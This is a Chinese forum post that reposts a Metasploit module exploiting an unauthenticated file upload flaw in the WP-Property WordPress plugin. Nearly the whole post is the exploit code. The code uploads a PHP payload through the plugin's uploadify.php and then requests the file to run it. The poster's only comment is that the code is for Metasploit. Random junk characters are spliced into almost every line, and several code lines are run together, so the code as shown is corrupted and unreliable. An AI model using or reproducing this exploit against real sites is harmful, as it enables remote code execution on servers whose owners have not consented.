WordPress WP-Property PHP 文件上传漏洞
5 u5 m( S6 a/ H* B: K% \
3 J1 H" j t8 H, `3 l5 \ ## # This file is part of the Metasploit Framework and may be subject to$ C# R) o7 c% H$ k8 p5 m! m: K
( W5 \9 C/ A z# T! |) S# redistribution and commercial restrictions. Please see the Metasploit
! r, v, L( z9 B$ U; z% o1 }' V6 ^) d7 g9 b6 ]/ L1 H* }- @4 a
# Framework web site for more information on licensing and terms of use.
$ S- _* x/ r6 P. w, `5 l$ f! i) ^$ \& @! j8 U- {4 l8 C3 r
# http://metasploit.com/framework/ ##( `+ u6 n: O# u. g: D$ G5 M
. A5 b5 |5 O3 ~* W2 l% _# S$ U $ `# w' b7 h+ x6 }: q
% }" s: K4 P; U( \ D
' N4 l. G& G t9 f
0 b6 q# P: Y/ L$ ? c2 zrequire 'msf/core'
! t/ ^/ Y o& D* Y- M; {' Prequire 'msf/core/exploit/php_exe'
& A+ h: o! G9 B* C3 R
# { Y# B7 g- Dclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',2 D- a" p Y1 J' i7 q+ z, |
'Description' => %q{7 K B) n" B# K
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
- d4 R& A) }7 g+ z% i4 X7 K[; @& w: m0 a9 E% z
'Sammy FORGIT', # initial discovery6 {" v& y# U7 w% Z7 r
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
; Y1 @" X& L4 t! i2 v; \+ E],
; p! H L4 W3 Z5 X/ i8 r'License' => MSF_LICENSE,! q% K4 e0 E: v
'References' =>
$ J- ~5 J6 Q, Q2 b: g% G! O# O. K[( Z8 g4 h M5 ? g2 S7 h" Q0 {
[ 'OSVDB', '82656' ],
2 G8 x$ h. C, H[ 'BID', '53787' ],
A$ b4 ^% k) v+ H[ 'EDB', '18987'],+ N- f# ~, ~8 G
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]. O4 M7 j$ X2 [/ p
],
) w, e) I- J1 D/ V6 K' I# h'Payload' =>" d( d- \9 U9 c/ ~
{
5 t# X8 E+ E$ o. q( C'BadChars' => "\x00",
( O2 V; M% y s P+ w* X},
( H( s+ C6 A4 S6 k7 L( _0 }'Platform' => 'php',% G4 i# Q1 |8 L' Y# K1 T8 X
'Arch' => ARCH_PHP,
# @& A& A! Y" q'Targets' =>
' u7 p5 ]5 X! g% @' ^" G8 a: g[5 E' S* E' f$ u; X( v+ s
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],) i& V1 J7 f g0 f9 W: L; M: H0 T
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]/ J5 r/ }* t, ?6 ~0 A* {" E: X
],4 W0 l' Z7 z+ F
'DefaultTarget' => 0,
. F4 S3 T9 M1 Q6 ~'DisclosureDate' => 'Mar 26 2012'))
" b! u: v9 n3 Z% D9 ~2 ]0 Q1 X6 W/ S; ?6 V
register_options(
7 K* G7 E, [2 n! I2 i4 [4 O- c3 S[ X- @ c8 \6 Z, @
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
% r% S8 w U) X], self.class)
w9 p% }4 [! m& p* }, Iend
# [) D9 R1 B" V# X+ ]/ o7 @+ |) y2 B+ |- }6 R
def check
; ?* j1 B: j+ q, q' Iuri = target_uri.path
2 z( x+ o& a3 H4 ~' U( I' Luri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
0 X( k5 D9 _5 r'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
* E% I8 [+ r3 P N: ` z' U* E, u})0 g2 B8 [! u( B0 C0 e& s
4 z" i: [- o3 K6 H" U2 o H E5 ~2 gif not res or res.code != 2002 Q+ h. Q6 {! T3 C& l
return Exploit::CheckCode::Unknown
$ j T3 D! m0 f/ Jend9 ^% q" K6 z: O1 \ p- M
U/ y: y) B2 C# ^$ Lreturn Exploit::CheckCode::Appears
+ R/ B* I0 d2 b! K) xend7 }# K( Q& e* u/ V; [
8 l+ t. f- |- C( ~; d
def exploit
9 O+ A. K$ P4 V6 Q7 juri = target_uri.path0 U" {6 ^1 H$ B) o( ~* |$ i
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
. T+ f9 a; \5 ?) e Q) ^- Q
1 Z* D+ t8 V0 W* q% L& odata = Rex::MIME::Message.new+ A |2 _7 v. ~) A
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")1 M! _+ w# v8 E; C z+ |
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
6 A. K# C" g9 z3 U$ I0 B$ Vpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
, q6 Z) Z, B1 P* t
. V: f0 t7 O1 d* z( u0 n( l5 r$ Q+ Lprint_status("#{peer} - Uploading payload #{@payload_name}")
: @: O) S4 W5 |res = send_request_cgi({( w7 {( H! ~) z1 x
'method' => 'POST',
}: F. A* U' i! U3 |5 `'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
7 {0 Y: W. M8 F% r'ctype' => "multipart/form-data; boundary=#{data.bound}",8 |) D8 c2 B0 |8 c! x* B
'data' => post_data
( [( F/ c, H; _: c- e8 ~})& c% J# k( L( D- F4 s2 w
; N0 k+ x6 I/ c9 R9 k2 Gif not res or res.code != 200 or res.body !~ /#{@payload_name}/0 Z" ]9 \' a" k' H4 C- ?( `
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
1 f4 z0 t/ V/ W. R9 \ pend
% T* c% _" |3 R" R0 q& o4 v5 A' U. R: v5 R2 }% w$ f" k1 [
upload_uri = res.body. }" \" |. d% ]. N! D& X
) F5 l; c& }+ O5 k* Bprint_status("#{peer} - Executing payload #{@payload_name}")
2 A; k5 p3 s: m0 J2 R* Y$ {! K3 a9 Eres = send_request_raw({
$ A2 f1 z3 ^7 `6 z" f8 m'uri' => upload_uri," T- _5 r" J& [, b* G
'method' => 'GET'. @. \; I9 D$ h. L/ p, J% h, O7 {
}). E; M1 ^3 i# }+ W j2 t
end! W8 p$ o3 W+ g
end% P9 b2 V; T* @& @# d( T
n- V |. R/ n6 y7 f
不要问我这写的是什么 怎么利用 我是说msf.( g' Z3 M3 [ |: P
2 l1 h( J; v" {% Q+ I |
发表于 2013-1-4 19:51:30
收藏
支持
反对